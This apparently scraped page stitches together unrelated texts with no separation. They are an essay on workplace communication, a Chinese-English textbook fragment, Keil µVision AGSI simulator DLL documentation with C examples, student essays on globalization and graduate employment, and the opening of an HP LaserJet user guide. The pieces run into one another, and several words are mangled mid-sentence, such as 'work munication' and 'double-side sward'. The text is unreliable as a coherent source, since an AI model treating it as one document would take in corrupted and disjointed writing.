Towards the Interchange of Configurable EPCs An XML-based Approach for Reference Model Conf
The Importance of Communication in TheWorkplace
The Importance of Communication in TheWorkplaceDefined as the interchange of thoughts, opinions, or information by speech, writing, or signs,communication is one of the most important work ethics that can be used within the work munication is used by everyone in the work place at all times. Employees communicate with each other to get their jobs done. Supervisors communicate with their staff to run a business proficiently. Everyone working within a business communicates with customers and consumers to make sure all of the clients' needs are met. Without it, no work could ever be accomplished. With communication from each worker, duties can be fulfilled smoothly with very few troubles. Any business lacking communication would automatically fail. Every company is based around good communication between employees and patrons.There are numerous positive aspects of communication in the work place. If a misunderstanding is discussed rather than spoken about behind someone's back, the problem could be cleared quickly, avoiding a possible crisis. Instead of putting up with something that one feels to be morally wrong, if the employee speaks of his or her disappointment or dismay, the situation could be overturned, therefore, providing a healthier, improved work atmosphere and a boost of self-worth. By conversing with managers and co-workers about the individual's feelings towards the job, better job satisfaction can be gained.With communication, many problems can be solved before they even have an opportunity to arise. For example, if an employee does not completely comprehend his or her assigned task, by approaching his or her overseer with the problem, a potential catastrophe could be avoided. If the employee would have just gone about the duty without asking for clearer directions, he or she may have faced dismissal from the job, therefore, leaving unemployed. Being fired on the spot for something as trivial as not asking questions can possibly damage your future job opportunities. So as one can see, a little communication can take someone a very long way. It may even take the employee as far as potentially saving his or her future work reputation with different companies.Along with positive aspects of communication, there are quite a few negative facets as well. It requires one's own judgment to deem certain types of communication as negative. Such harmful communication may include a situation in which a worker openly expresses his or her complaints about the job simply because he or she is feeling too lethargic to do it. By grumbling about the work instead of accepting the job he or she was asked to do, an employer may reason this employee to not be of any use to the company. Another situation involving negative communication may include a person that bluntly gives negative criticism rather than positive criticism. If a worker constantly criticizes a co-worker, the morale of the whole company may plunge consequently decreasing the workers' productivity. Such disparagement may make employees feel insecure or apprehensive about their work, thus causing them to work less or inefficiently. Workers must be sure to always use clear judgment when deciding which type of communication is negative and which is positive. A lapse in judgment could be detrimental to one's life.In order to avoid all of the negative outcomes of poor communication, all problems, issues, and complaints should be discussed with higher authority in the work place. By discussing everything with a supervisor, all assignments are elucidated, which allows a better chance for sufficient work. If there are any issues or conditions that must be met, a worker and his or her manager may be able to work out a compromise, making a job run more smoothly. If workers do not speak up when a problem arises, the dilemma will never be solved, and all productivity will decline. Miscommunication troubles harm not only the individual with the problem but also the whole company as well as the company's clientele.In conclusion, communication is the key to a satisfactory work environment. Communication is valuable to every person within the work place. If no communication were ever used, it would be impossible to conduct any type of business efficiently. If ever faced with a problem, be sure to discuss it thoroughly with a supervisor. Matters should never be taken into one's own hands when the assignment is unclear. They should always be clarified to make sure the job is done munication will make not only the professional life easier to conduct but the private life easier as well. Never use communication in the work place as a weapon. Communicating can be a very powerful act, so always think before speaking. By discussing thoughts, problems, issues, plans, opinions, or ideas, things will be handled in a very proficient manner.。
My-Advice-to-Students-Education-Counts
Unit 5
2023最新整理收集 do sto Menu
Passage B
Read About It
• Language Points • Content Awareness • Language Focus
My Advice to Students: Education Counts
perceive v. — think of sb/sth. in a particular way
Examples • 他们将电视视为娱乐。 • They perceive television as entertainment. • 成人们学他们认为对其生活有帮助的东西。 • Adults learn what they perceive to be useful for their
One parent wrote me that her 15-year-old son “lost himself in the hole of the computer.” He got an A in website design, but other grades were sinking, she said.
KEIL仿真的AGSI接口
C Compilers • Real-Time OS • Simulators • Education • Evaluation BoardsImplementing µVision DLL’s for Application Note 154 Advanced Generic Simulator Interface Rev. 4Extended by Infineon TechnologiesContents Contents (1)Introduction (3)How to use a Sample Peripheral DLL (4)Implementing own peripheral DLLs: Required Steps (7)How simulation basically works (8)Address representation (9)AGSI Function Description (10)AgsiEntry (11)AgsiDefineSFR (13)AgsiDefineVTR (14)AgsiDeclareInterrupt (15)AgsiSetWatchOnSFR (17)AgsiSetWatchOnVTR (18)AgsiSetWatchOnMemory (19)AgsiCreateTimer (20)AgsiSetTimer (21)AgsiDefineMenuItem (22)AgsiRegisterExecCallBack (24)AgsiWriteSFR (25)AgsiReadSFR (26)AgsiSetSFRReadValue (27)AgsiWriteVTR (28)AgsiReadVTR (29)AgsiWriteMemory (30)AgsiReadMemory (31)AgsiGetStates (32)AgsiGetProgramCounter (33)AgsiIsInInterrupt (34)AgsiIsSleeping (35)AgsiIsSimulatorAccess (36)AgsiIsSyncInstruction (37)AgsiGetSyncCount (38)AgsiSetSyncCount (39)AgsiSetSyncDelay (40)AgsiStopSimulator (41)AgsiWakeUp (42)AgsiTriggerReset (43)AgsiContinue (44)AgsiRequestInterrupt (45)AgsiSetSyncCount (46)AgsiUpdateWindows (47)AgsiHandleFocus (48)AgsiGetExternalClockRate (49)AgsiSetExternalClockRate (50)AgsiGetInternalClockRate (51)AgsiGetClockFactor (52)AgsiMessage (53)AgsiSetTargetKey (54)AgsiGetTargetKey (55)AgsiExecuteCommand (56)AgsiGetLastMemoryAddress (57)AgsiGetSymbolByName (58)AgsiGetSymbolByValue (59)Extensions by Infineon Technologies (61)Index (62)IntroductionThe µVision Debugger supports a simulator interface for implementing user-defined peripherals. This interface is called A dvanced G eneric S imulator I nterface (AGSI). The AGSI introduces a flexible and easy way for adding new user defined peripherals directly to µVision. It provides functions that are necessary to simulate the peripheral’s behavior as well as functions to display peripheral dialogs.To ease the development of a user-defined peripheral, the AGSI and a configuration framework is provided in two example projects. Only µVision version 2.21 or later supports all functions that are described in this document.AGSI Revision 3 is for µVision3 (version 3.00 or higher) and adds the following features: •AgsiEntry has new function codes (nCODE= AGSI_PRE_RESET, AGSI_CMDOUT)•The CALLBACK function for AgsiSetWatchOnSFR, AgsiSetWatchOnVTR, and AgsiSetWatchOnMemory gets now the address and access reason when it is called.AGSI DLL’s that have been developed for µVision2 can still be used with µVision3.SPeriDLLSPeriDLL, is a synonym for ‘Sample Peripheral DLL’. It is a ready to run peripheral DLL which implements a ‘A/D Converter from Analog Devices ADuC812’ as a sample peripheral. It uses most of the AGSI functions to implement this peripheral. The project consists of a MS Visual-C++ (6.0) project file and the following source files:AGSI.h: prototypes for the AGSI functions (do not modify!)SPeriDLL.h: main header file with various prototypes and definitionsSPeriDLL.cpp: main file (created by AppWizard) contains setup code and simulationPeriDialog.h: header file (created by Class Wizard) for a modeless peripheral dialogPeriDialog.cpp: implementation file for a modeless peripheral dialogAlso a simple µVision test project ‘Single A/D conversion with ADuC812’ is included in the fileS812ADC.zip which shows how to include and test the implemented peripheral.STimerDLLSTimerDLL, is a synonym for ‘Sample Timer DLL’. It is a ready to run peripheral DLL which implements a ‘Timer 3’ as a sample peripheral. As regards functionality, ‘Timer 3’ is identical to a standard 8051 Timer 1 but has different SFR addresses so that it can be loaded in addition to a ‘Timer 1’. It uses most of the AGSI functions to implement this peripheral. The project consists of a MS Visual-C++ (6.0) project file and the following source files:AGSI.h: prototypes for the AGSI functions (do not modify!)Common.h: header file with various prototypes and definitionsCommon.cpp: common support functions for AGSI and dialog functionsSTimerDLL.h: header file for STimerDLL classSTimerDLL.cpp: main file provides peripheral setup code and simulationPeriDialog.h: header file (created by Class Wizard) for a modeless peripheral dialogPeriDialog.cpp: implementation file for a modeless peripheral dialogAlso a simple µVision test project is included in the file Timer3.zip which shows how to include and test the implemented peripheral.In order to develop a peripheral, knowledge about C/C++ programming and the MS Visual-C++ 6.00 Programming Environment is required.How to use a Sample Peripheral DLLIn order to use one of the Sample Peripheral DLL’s, you must perform the steps below. The following steps are described for the SPeriDLL but the same applies for the STimerDLL:•Install µVision and the C51 Compiler on your PC.•Create a folder such as D:\Src32\SPeriDLL\•Unzip the file SPeriDLL.zip into the folder. Make sure that the ‘use folder names’ checkbox is checked since SPeriDLL uses some subfolders.•Create a folder such as C:\Keil\C51\Examples\S812ADC\•Unzip the file S812ADC.zip into the folder.•Start Visual-C, select the ‘SPeriDLL.dsw’ project file.•Select ‘Project – Settings’. Click at the ‘Debug’ tab. Browse for the ‘Executable for Debug session’. You need to select the file Uv2.Exe. It is normally in C:\Keil\Uv2 but this depends onwhere you have installed µVision.•Then click at the ‘Custom Build’ tab and write in the ‘Commands’ window the command ‘copy $(InputPath) C:\KEIL\C51\BIN\$(InputName).dll’ and write in the ‘Outputs’ window the outputfile ‘C:\KEIL\C51\BIN\$(InputName).dll’. This step is required to automatically copy the created DLL after building it in the BIN subfolder of µVision which is normally C:\KEIL\C51\BIN butdepends on where you have installed µVision. If everything is right, then the dialog should look like this:•After that, close the dialog.•Select ‘Build – Set active configuration’, choose the SPeriDLL Win32 Debug configuration. •Select ‘Build – Rebuild All’ to create the DLL.•Run µVision by pressing the F5 key. Select ‘Project – Open Project’, the Select Project dialog comes up. Select the ‘S812ADC.uv2’ project. It can be found in the folder that you havecreated and copied the project files into (normally C:\Keil\C51\Examples\S812ADC). •Select ‘Rebuild all target files’ to build the project.•Select ‘Options for Target – Debug’. Enable loading of the SPeriDLL peripheral DLL by simply adding the parameter ‘-dSPeriDLL’ to the parameter list of the ‘Dialog DLL’. The parameter format for peripheral DLL’s is ‘-dDLLName’ (DLL name without extension). Make sure that the ‘Use Simulator’ radio button is checked. If everything is right, then the dialog should look like this:•Close the dialog.•Select ‘Debug – Start/Stop Debug Session’. This will start the µVision Debugger. It initializes and loads also our SPeriDLL.dll. In the ‘Peripherals’ menu a new item should be present withthe label ‘A/D Converter’. Click on this item to open the peripheral dialog which looks like this:•Now you can single step through the code of the ‘Single A/D conversion with ADuC812’ sample and observe the behavior of the ‘A/D Converter’ peripheral and also other peripherals like ‘Port 0’ , ‘Port 2’, ‘Port 3’ and ‘Interrupt’.Note that this sample program demonstrates functionality of only a small part of the A/D Converter.Implementing own peripheral DLLs: Required StepsIn order to develop a peripheral DLL you should perform the following steps:•Start MS Visual-C++ and create a new project ‘MFC AppWizard (dll)’.•Add prototypes and definitions for the AGSI and SFR’s (S pecial F unctions R egisters) and VTR’s (V ir t ual R egisters) definitions to the main header file (*.h).•Write code for the peripheral initialization into the main file (*.cpp). This includes AGSI setup (GetFunctionPointers), declaration of peripheral menu entries and associated dialogs(DefineAllMenuEntries), declaration of SFR’s (DefineAllSFR), VTR’s (DefineAllVTREG),Watches (DefineAllWatches) and Interrupts (DefineAllInterrupts). Write also code for peripheral reset - SFR’s reset values (ResetPripheral). All this functions are called from the functionAgsiEntry() which must be exported by this peripheral DLL.•Write functions for simulation of the peripheral into the main file (these functions are triggered by the defined watches). Include also prototypes of these functions.•Create a peripheral dialog with the Resource Editor (if the dialog is required) and the associated header file (*.h) and implementation file (*.cpp) using the ‘MFC ClassWizard’. Don’tforget to set the ‘Visible’ property of the dialog and include the default buttons ‘OK’ and ‘Cancel’ and make them invisible (required for the behavior of the ESC and Enter keys). Change thedefault constructor for the dialog and add functions PeriDisp() – displays dialog, PeriUpdate() – updates display contents which calls function Update() and PeriKill() – closes the dialog. Addalso a menu definition (AGSIMENU) and a dialog definition (AGSIDLGD).•Write the code for updating the display contents into the Update() function in the dialog implementation file. This function is called automatically when an update is requested and isused to reflect the current state of the peripheral.•Add functions for dialog control item’s messages by using ‘MFC ClassWizard’. Most frequently used messages are: ON_BN_CLICKED for Buttons, ON_EN_KILLFOCUS for Edit Boxes,ON_CBN_SELCHANGE for Combo Boxes …Include also functions for the two invisible buttons ‘OK’ and ‘Cancel’.•Select ‘Project – Settings’. Click at the ‘Debug’ tab. Browse for the ‘Executable for Debug session’ and select the file Uv2.Exe. It is normally in C:\Keil\Uv2 but this depends on where you have installed µVision.•Rebuild your peripheral DLL. Then copy the DLL file to the BIN subfolder of µVision which is normally C:\KEIL\C51\BIN but depends on where you have installed µVision or use the‘Custom Build’ within MS Visual-C++ and write the command that automatically copies the DLL after rebuild (see previous description in the ‘Sample Peripheral DLL’).•Test your peripheral DLL by running µVision (press the F5 key). Select a test project and enable loading of the implemented peripheral DLL by simply adding the parameter‘−dDLLName’ (DLL name without extension) to the parameter list of the peripheral DLL (seeprevious description in the ‘Sample Peripheral DLL’).•If the implemented peripheral is running, switch into Release Mode and rebuild it. Then test the peripheral DLL again (don’t forget to copy the ‘Release DLL’ file to the BIN subfolder ofµVision).How simulation basically worksIf every simulated peripheral would be updated with every simulated CPU instruction, the performance of the simulator would be extremely low. That’s why µVision simulator uses a event driven simulation instead. Events (also called watches) are read or write accesses to special function registers (SFR), virtual register (VTR) or memory areas and when a software timer expires. The following two examples explain this in detail:Analog Digital Converter (see SPeriDLL):Let’s assume that an A/D converter has configuration register (SFR’s ADCCONx), data register (SFR’s ADCDATAx), 8 analog inputs (VTR’s AIN0-7) and one external pin (VTR CONVST) to start a conversion. The A/D converter does nothing until it is started so no functions are called to simulate it and no simulation time is consumed at this time. In order to ‘see’ when the A/D converter is configured and started, so called access watches (AgsiSetWatchOnSFR and AgsiSetWatchOnVTR) need to be set on the configuration register and on the external start pin. This is done in the function ‘DefineAllWatches’. Whenever a new value is written into the ADCCONx register or into the external start pin, the function‘AdcConv’ is called. This function has to check the configuration, reference voltages and the analog inputs in order to calculate the digital value. The digital result cannot be written into the data register at this time. A real A/D converter needs some time to sample and convert an analog voltage. In order to simulate this behavior, a software timer is set (AgsiSetTimer) which calls the function ‘AdcCompleted’ after the specified number of states. This function writes the digital value into the data register, clears the busy flag, and sets the interrupt request bit.16 Bit Timer (see STimerDLL):Even a timer does not need to update (recalculate) its values with every simulated instruction. Typically, the timer values need to be updated when the configuration changes (start/stop, prescaler value) and when the actual timer value is read. Therefore, a write access watch must be set on the configuration register and read access watches must be set on the timer register. The timer calculation function stores the time (states) in a static variable whenever it is called. With the time difference (actual states – last states) the actual timer value can be calculated. With this method, the timer values can be calculated at any time with a minimum of calculation overhead. Only the interrupt on a timer overflow cannot be handled that way. With an additional software timer (AgsiSetTimer) set to this event, the timer is recalculated with every overflow. When a overflow is detected, the interrupt request flag is set and the timer is reloaded with 0 or a specific reload value.Address representationDepending on the microcontroller family, µVision maps the different memory areas (XDATA / DATA / CODE) into one linear address range. These different memory areas are represented with the following values in the most significant byte of a 32 bit address:80166 Microcontroller: This microcontroller has a 16 Mbyte linear address space. The valid address range therefore is from 0 to 0x00FFFFFF. No different memory types are needed.8051 Microcontroller:Define Memory type Address RangeamXDATA XDATA 0x0000 – 0xFFFFamPDATA PDATA 0x0000 – 0x00FF (one page of XDATA)amDATA DATA 0x0000 – 0x00FFamIDATA IDATA 0x0000 – 0x00FF (0x00 – 0x7F = DATA)amCODE CODE 0x0000 – 0xFFFFamBANK0 Bank 0 0x0000 – 0xFFFFamBANK0 + n Bank n 0x0000 – 0xFFFFamBANK31 Bank 31 0x0000 – 0xFFFF80251 Microcontroller: Following types can be used in addition to the memory types of the 8051 Family Define Memory type Address RangeamEDATA EDATA 0x0000 – 0xFFFFamECODE ECODE 0x0000 – 0xFFFFFFamHDATA HDATA 0x0000 – 0xFFFFFFamHCONS HCONST 0x0000 – 0xFFFFFFamCONST CONST 0x0000 – 0xFFFFSLE66 Microcontroller: Following types can be used in addition to the memory types of the 8051 FamilyDefine Memory type Address RangeamPHYS physical 0x0000 – 0xFFFFFFExample:BYTE buffer[10];AgsiReadMemory(0x1000|(amCODE<<24),10,buffer);// read 10 bytes to (CODE) address 0x1000 AgsiReadMemory(0x1000|(amCODE<<16),10,buffer);// the same function but for SLE66 processorAGSI Function DescriptionAgsiEntry is the only function of a peripheral DLL that is called directly from the µVision simulator. All other functions described below are in the µVision simulator and can be called from the peripheral DLL. Functions to define SFR’s, VTR’s, interrupts, timer, menus, dialogs and access watches. These functions can only be called during the initialization.AgsiDefineSFR AgsiDefineVTRAgsiDeclareInterrupt AgsiSetWatchOnSFRAgsiSetWatchOnVTR AgsiSetWatchOnMemoryAgsiCreateTimer AgsiDefineMenuItemAgsiRegisterExecCallBackFunctions to read and write memory, SFR’s and VTR’s:AgsiWriteSFR AgsiReadSFRAgsiWriteVTR AgsiReadVTRAgsiWriteMemory AgsiReadMemoryFunctions to retrieve simulator status information:AgsiGetStates AgsiGetProgramCounterAgsiIsInInterrupt AgsiIsSleepingAgsiIsSimulatorAccess AgsiIsSyncInstructionAgsiGetSyncCount AgsiGetExternalClockRateAgsiGetInternalClockRate AgsiGetClockFactorAgsiGetLastMemoryAddressFunctions to control the simulator:AgsiSetTimer AgsiSetSFRReadValueAgsiStopSimulator AgsiWakeUpAgsiTriggerReset AgsiContinueAgsiRequestInterrupt AgsiSetSyncCountAgsiSetSyncDelay AgsiSetExternalClockRateAgsiUpdateWindows AgsiHandleFocusAgsiMessage AgsiExecuteCommandFunctions to store and retrieve configuration information:AgsiSetTargetKey AgsiGetTargetKeyFunctions to retrieve symbol values or symbol names:AgsiGetSymbolByName AgsiGetSymbolByValueAgsiEntrySummary:extern "C" DWORD AGSIEXPORT AgsiEntry (DWORD nCode, void *vp)Parameter:nCode Function selector. All possible values are listed below.vp Pointer to various objects depending on nCode. In order to use this pointer, itmust be casted to the required data type.Return Value:The function should return TRUE(1) if completed successfully or FALSE(0) if an error occurred.Description:AgsiEntry is the only function of a peripheral DLL that has to be exported. It is called from µVision when a debug session is started to initialize the peripheral simulation as well as during the debugging session to notify events. The meaning of vp depends on the value of nCode. AgsiEntry can be called with the following nCode values:Value of nCode Value of vp FunctionAGSI_CHECK 8051 or 80166 Check CPU TypeAGSI_INIT Pointer to AGSICONFIG Initialize DLLAGSI_TERMINATE Not used TerminateAGSI_RESET Not used ResetAGSI_PREPLL Not used CPU clock is about to be changedAGSI_POSTPLL Not used CPU clock was changedAGSI_PRERESET Not used Called before Reset, but CPU cyclesstill validAGSI_CMDOUT Pointer to Text Command output of 'exec' commands AGSI_ONINTERRUPT Pointer to Interrupt number Interrupt from a deviceAGSI_ONRETI Pointer to Interrupt number Interrupt acknowledgedAGSI_ENTERSLEEP Not used Power down mode enteredAGSI_EXITSLEEP Not used Power down mode exitedAGSI_CHECKThe first call to AgsiEntry is done with nCode=AGSI_CHECK. The pointer vp points to a DWORD which contains either the value 8051 or 80166, or 7 (for ARM) depending on the microcontroller family that is selected in the current project. This call checks if the DLL can be used for the specifiedmicrocontroller family. The function should return TRUE(1) if the DLL supports this microcontroller family or FALSE(0) if not.AGSI_INITThe second call to AgsiEntry is done with nCode=AGSI_INIT. The pointer vp points to the structure AGSICONFIG which contains information about the project and the parameters for this DLL. This information can be used to configure the peripheral DLL. Additional parameters (format: –option) for the DLL can be entered in the µVision dialog ‘Options for Target -> Debug - > Dialog DLL Parameter’. The DLL can analyze the ‘m_pszConfiguration’ string to extract the information. The‘m_pszProjectPath’ can be used to store log files or additional configuration files for the current project.typedef struct {HINSTANCE m_hInstance; // Instance handle to retrieve the function addressesconst char* m_pszProjectPath; // Path to application e.g. C:\KEIL\C51\EXAMPLES\HELLO const char* m_pszDevice; // Simulated Device e.g. 52. This string is extracted// out of the -p option.const char* m_pszConfiguration; // Complete dialog DLL options e.g. -p52 -dmydll ...const char* m_pszAppFile; // Name of loaded OMF file including path e.g.C:\KEIL\C51\EXAMPLES\HELLO\HELLO //HWND m_hwnd; // Mainframe parent window} AGSICONFIG;When AgsiEntry is called with AGSI_INIT, all special function register (SFR), virtual register (VTR), interrupts, watch points and dialogs that need to be simulated must be defined. The function should return FALSE(0) if an error occurs or TRUE(1) if the function has been executed successfully.AGSI_TERMINATEAgsiEntry is called with nCode=AGSI_TERMINATE when the µVision debugger is closed. The pointer vp is not used in this case. When files have been opened during initialization they must be closed and if memory has been allocated, it must be freed.AGSI_RESETAgsiEntry is called with nCode=AGSI_RESET when the simulated CPU is reset. All peripherals (SFR’s) must be set to their reset state. There are several situations where a CPU reset is executed: - When the simulator is started (after AGSI_INIT).- After an application is loaded.- When RESET is entered in the command line or when the reset button is pressed in the toolbar.- When a watchdog timer overflow occurs.The pointer vp is not used in this case.AGSI_PREPLL, AGSI_POSTPLLAgsiEntry is called with nCode=AGSI_PREPLL or AGSI_POSTPLL before and after the CPU clock frequency changes. Some CPU’s have a clock prescaler that can be reprogrammed to save power. In case a peripheral is not connected to the same clock as the CPU, the values for AgsiSetTimer probably need to be recalculated when the CPU clock is modified. This function call notifies a peripheral before and after the CPU clock frequency has changed so that the timer values can be corrected for the new clock. The pointer vp is not used in this case.Summary:BOOL AgsiDefineSFR(const char* pszSfrName, AGSIADDR dwAddress,AGSITYPE eType, BYTE bBitPos);Parameter:pszSfrName Pointer to name of the SFRdwAddress Address of the SFR. Following address ranges are possible:8051/251: 0x80 – 0xFF8051Mx: 0x80 – 0xFF and 0x180 – 0x1FF80166: 0xF000 – 0xF1FE and 0xFE00 – 0xFFFE (even address) eType Type of the SFR.orAGSIBIT8051: AGSIBYTE80166: AGSIWORD or AGSIBITWith AGSIBIT, dwAddress must point to a bit addressable area:8051: 0x80, 0x88, … , 0xF0, 0xF8 every 8th byte80251: 0x80 - 0xFF every byte8051Mx: 0x80 - 0xF8 and 0x180 – 0x1F8 every 8th byte80166: 0xF100 – 0xF1FE and 0xFF00 – 0xFFFE (even address) bBitPos Bit position within SFR (only for eType=AGSIBIT).8051/251/Mx: 0 – 780166: 0 – 15Return Value:TRUE if successful, FALSE in case of wrong address or too many definitions (at least 300 for all loaded DLL’s).Description:This function is used to define a SFR (S pecial F unction R egister) or a SFR bit. These definitions can be listed in the symbol window and can be used in the watch window and command line.Note:This function may only be called during the initialization process.Example:AgsiDefineSFR("IE", 0xA8, AGSIBYTE, 0); // 8051: IEAgsiDefineSFR("EA", 0xA8, AGSIBIT, 7); // 8051: EA bit in IEAgsiDefineSFR("PSW", 0xFF10, AGSIWORD, 0); // 80166: PSWAgsiDefineSFR("IEN", 0xFF10, AGSIBIT, 11); // 80166: IEN bit in PSWSummary:AGSIVTR AgsiDefineVTR(const char* pszVtrName, AGSITYPE eType,DWORD dwValue);Parameter:pszVtrName Name of the VTReType Type of the VTR (AGSIVTRCHAR, AGSIVTRWORD, AGSIVTRLONG orAGSIVTRFLOAT)dwValue Initial Value of the VTR. Initializing float values is a little difficult sincedwValue is defined as DWORD. In this case, the float value can be convertedto a DWORD using a union.Return Value:VTR handle if successful otherwise NULL.Description:This function is used to declare a VTR (V ir t ual R egister). VTR’s are used to display or to set values that are usually set by hardware. With this function, new VTR’s can be defined or the handle of already defined VTR’s can be retrieved.Note:This function may only be called during the initialization process.Example:hXTAL = AgsiDefineVTR("XTAL", AGSIVTRLONG, 0x00B71B00); // 12MHzhVREF = AgsiDefineVTR("VREF", AGSIVTRFLOAT, 0x40200000); // 2.5VhVREF = AgsiDefineVTR("MYPORT", AGSIVTRCHAR, 0x000000FF); // all pins highAgsiDeclareInterruptSummary:BOOL AgsiDeclareInterrupt(AGSIINTERRUPT *pInterrupt);Parameter:PInterrupt Pointer to an AGSIINTERRUPT structure (see below).Return Value:TRUE if successful otherwise FALSE.Description:This function is used to define an interrupt source of an on-chip peripheral. All the information about this interrupt source is passed to the function with a structure. It defines the interrupt vector address as well as all request, enable and priority flags. This information automatically adds another line in the Interrupt Dialog. The structure is different for every microcontroller family and is described in the following AGSIINTERRUPT structure:// 8051/251/8051Mxtypedef struct {AGSIADDR vec; // interrupt vector addresschar *mess; // interrupt name (will be shown in interrupt dialog)// The mode bit is only shown in the interrupt dialog.// It has no influence on interrupt processing.AGSIADDR msfr; // interrupt mode sfr.WORD mmask; // interrupt mode bit mask (only one bit may be set)const char *mname; // name of interrupt mode bitAGSIADDR rsfr; // interrupt request sfrWORD rmask; // interrupt request bit mask (only one bit may be set) const char *rname; // name of interrupt request bitAGSIADDR esfr; // interrupt enable sfrWORD emask; // interrupt enable bit mask (only one bit may be set)const char *ename; // name of interrupt enable bitAGSIADDR p0sfr; // interrupt priority 0 sfrWORD p0mask; // interrupt priority 0 bit mask (only one bit may be set) const char *pname; // name of interrupt priority bitAGSIADDR p1sfr; // interrupt priority 1 sfr. =0 if CPU only supports 2 levels WORD p1mask; // interrupt priority 1 bit mask (only one bit may be set) WORD pwl; // priority within level (1 – lowest priority)WORD auto_reset; // reset interrupt request flag on interrupt entry} AGSIINTERRUPT;// 80166typedef struct {AGSIADDR vec; // interrupt vector address (must be a even address)char *mess; // interrupt name (will be shown in interrupt dialog)AGSIADDR sfr; // interrupt control sfr which contains ILVL, GLVL, IR and IE } AGSIINTERRUPT;// SLE66typedef struct {AGSIADDR vec;char *mess; // Interrupt nameconst char *rname; // name of interrupt request bitconst char *ename; // name of interrupt enable bitconst char *pname; // name of interrupt priority bitDWORD num; // Interrupt NumberDWORD pwl; // priority within level} AGSIINTERRUPT;Note:This function may only be called during the initialization process.Example:// 8051/251/8051Mx#define TCON 0x88#define IE 0xA8#define IP 0xB8#define IPH 0xB7AGSIINTERRUPT ExtInt0 = { // External Interrupt 00x0003, "P3.2/Int0", TCON, 0x01, "IT0", TCON, 0x02, "IE0", IE, 0x01, "EX0", IP, 0x01, "Pri", IPH, 0x01, 8, 1};AGSIINTERRUPT Timer0Int = { // Timer 0 Interrupt0x000B, "Timer 0", 0, 0, "", TCON, 0x20, "TF0", IE, 0x02, "ET0", IP,0x02, "Pri", IPH, 0x02, 6, 1};AgsiDeclareInterrupt(&Timer0Int);AgsiDeclareInterrupt(&ExtInt0);// 80166#define S0TIC 0xFF6CAGSIINTERRUPT SerTransmitInt = { // Serial Transmit Interrupt0x00A8, "S0TINT", S0TIC}AgsiDeclareInterrupt(&SerTransmitInt);Summary:BOOL AgsiSetWatchOnSFR(AGSIADDR SFRAddress, AGSICALLBACKApfnReadWrite,AGSIACCESS eAccess);Parameter:SFRAddress Address of the SFRpfnReadWrite Pointer to a function that is called on SFR access. The function gets asargument the address and the access reason to the memory and does nothave a return value (void function(DWORD adr, AGSICB_REASON r)).eAccess Access type (AGSIREAD, AGSIWRITE, AGSIREADWRITE)Return Value:TRUE if successful otherwise FALSE.Description:This function is used to set a watch on SFR access. Whenever the specified SFR is accessed, the specified function is called.Example:#define TCON 0x88#define TL1 0x8B#define TH1 0x8Dstatic void timer1(DWORD adr, AGSICB_REASON r) {// watch function implementation}AgsiSetWatchOnSFR(TH1, timer1, AGSIREADWRITE); //Call ‘timer1’ when TH1 is written or read AgsiSetWatchOnSFR(TL1, timer1, AGSIREADWRITE); //Call ‘timer1’ when TL1 is written or read AgsiSetWatchOnSFR(TCON, timer1, AGSIWRITE); //Call ‘timer1’ when TCON is written。
globalization
China Under GlobalizationGlobalization is the process of international integration arising from the interchange of world views, products, ideas, and other aspects of culture. Ever since the opening-up policy began in 1978, globalization has rapidly spread over China. People have different attitude towards globalization. The advocates expect it can bring prosperity and development, while the opponents assert it will bring disaster, war, even extinction of culture. Globalization indeed is a double-side sward, but as far as I'm concerned, the advantages are more than disadvantages.In the first place, globalization greatly boosts China’s economical development. In the next five years since China joined WTO in 2001, China’s GDP almost doubled; people’s average income also increased a lot; all kinds of transnational companies appeared in China and investors from different countries become more and more. In addition, many world famous brands come into China, such as Chanel, Calvin Klein, Burberry and so on. These all promote China's economy.In the second place, under the globalization, Chinese culture go out of China and step on the international stage. Chinese culture, especially ancient Chinese culture-----Confucianism is famous to many foreigners. Confucius Institutes are founded in many countries, which invokes a wave of learning Chinese. Meanwhile, western culture enters into China, which increases the culture diversities and forms the communicationamong different cultures.In conclusion, China benefits a lot from globalization though it is also the victim of globalization. Now that globalization has become reality, why not taking advantages of it and benefiting from it? We should believe that human effort can achieve anything.。
学业文凭 就业英语作文
学业文凭就业英语作文It's very hard for college graduates to find a job,of course harder to get an ideal job.In fact,many factors contribute to the unfavorable situation.First,more and more students can go to college because of the being fast improved high education of China.As a result,there are more graduates every year.However,job vacancies don't increase that fast.More people,less food,which is the exact description of the hard condition.Second,more and more people go on to pursue their master and doctor degree;more and more Chinese oversea students come back to China to hunt better working chances.It is sure that the competition is more and more fierce.Third,because of the fast development of science,technology,economy,society and the interchange of different nations,all units have higher requirement of their employees,for example,stronger ability and higher degree.In addition to the factors above,there are still more which bring hardship for graduates to find jobs.Nevertheless,how to solve the problem is more important.It is a good idea for the graduates to learn more knowledge with a higher degree andto practice and improve their capability of dealing with all kinds of situation,organization,having good terms with others and cooperative spirit.Besides,the government should try to and encourage all units to create more job vacancies for the college graduates.Of course,the graduates should have a proper attitude towards various jobs,but not always pursue those with higher payment.。
HP Color LaserJet Enterprise MFP M776用户指南说明书
Legal informationCopyright and License© Copyright 2019 HP Development Company, L.P.Reproduction, adaptation, or translation without prior written permission is prohibited, except as allowedunder the copyright laws.The information contained herein is subject to change without notice.The only warranties for HP products and services are set forth in the express warranty statementsaccompanying such products and services. Nothing herein should be construed as constituting anadditional warranty. HP shall not be liable for technical or editorial errors or omissions contained herein.Edition 1, 10/2019Trademark CreditsAdobe®, Adobe Photoshop®, Acrobat®, and PostScript® are trademarks of Adobe Systems Incorporated.Apple and the Apple logo are trademarks of Apple Inc., registered in the U.S. and other countries.macOS is a trademark of Apple Inc., registered in the U.S. and other countries.AirPrint is a trademark of Apple Inc., registered in the U.S. and other countries.Google™ is a trademark of Google Inc.Microsoft®, Windows®, Windows® XP, and Windows Vista® are U.S. registered trademarks of MicrosoftCorporation.UNIX® is a registered trademark of The Open Group.iiiT able of contents1 Printer overview (1)Warning icons (1)Potential shock hazard (2)Printer views (2)Printer front view (2)Printer back view (4)Interface ports (4)Control-panel view (5)How to use the touchscreen control panel (7)Printer specifications (8)T echnical specifications (8)Supported operating systems (11)Mobile printing solutions (12)Printer dimensions (13)Power consumption, electrical specifications, and acoustic emissions (15)Operating-environment range (15)Printer hardware setup and software installation (16)2 Paper trays (17)Introduction (17)Load paper to Tray 1 (multipurpose tray) (17)Load Tray 1 (multipurpose tray) (18)Tray 1 paper orientation (19)Use alternative letterhead mode (24)Enable Alternative Letterhead Mode by using the printer control-panel menus (24)Load paper to Tray 2 (24)Load Tray 2 (24)Tray 2 paper orientation (26)Use alternative letterhead mode (29)Enable Alternative Letterhead Mode by using the printer control-panel menus (29)Load paper to the 550-sheet paper tray (30)Load paper to the 550-sheet paper tray 